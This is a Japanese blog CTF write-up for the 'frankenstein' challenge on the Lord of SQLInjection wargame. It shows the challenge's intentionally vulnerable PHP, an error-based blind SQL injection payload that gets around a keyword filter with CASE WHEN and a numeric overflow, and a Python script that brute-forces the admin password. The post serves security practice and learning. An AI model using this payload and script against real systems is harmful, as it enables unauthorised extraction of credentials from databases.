はまやんはまやんはまやん

hamayanhamayan's blog

frankenstein [LORD OF SQLINJECTION]

Lord of SQLInjection

<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(|\)|union/i', $_GET[pw])) exit("No Hack ~_~");
$query = "select id,pw from prob_frankenstein where id='frankenstein' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(mysqli_error($db)) exit("error");

$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_frankenstein where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("frankenstein");
highlight_file(__FILE__);

特徴は以下。

  • pwを入力する。以下フィルターがある
    • prob,_,.,(,),unionがフィルタリング
  • adminのpw要素を抜き出す

Error-Based Blind SQL Injection

色々使えないが、case whenは使える。
中身はこれで取ってくる。
' or id='admin' and case when pw like '{ans}{c}%' then 1 else 9e307*2 end #

import requests

url = "https://los.rubiya.kr/chall/frankenstein_b5.php"
cookie = {'PHPSESSID': 'eodcti0jvp87pmvnr63hn7efq5'}

def check(data) -> bool:
    return "</strong><hr><br>error" not in data

ans = ""
for j in range(0, 50):
    ok = False
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ,":
        q = f"' or id='admin' and case when pw like '{ans}{c}%' then 1 else 9e307*2 end #"
        res = requests.get(url, params={'pw': q}, cookies=cookie)
        if check(res.text):
            ans += c
            print(f"[+] {ans}")
            ok = True
            break
    if not ok:
        break
print(f"[*] {ans}")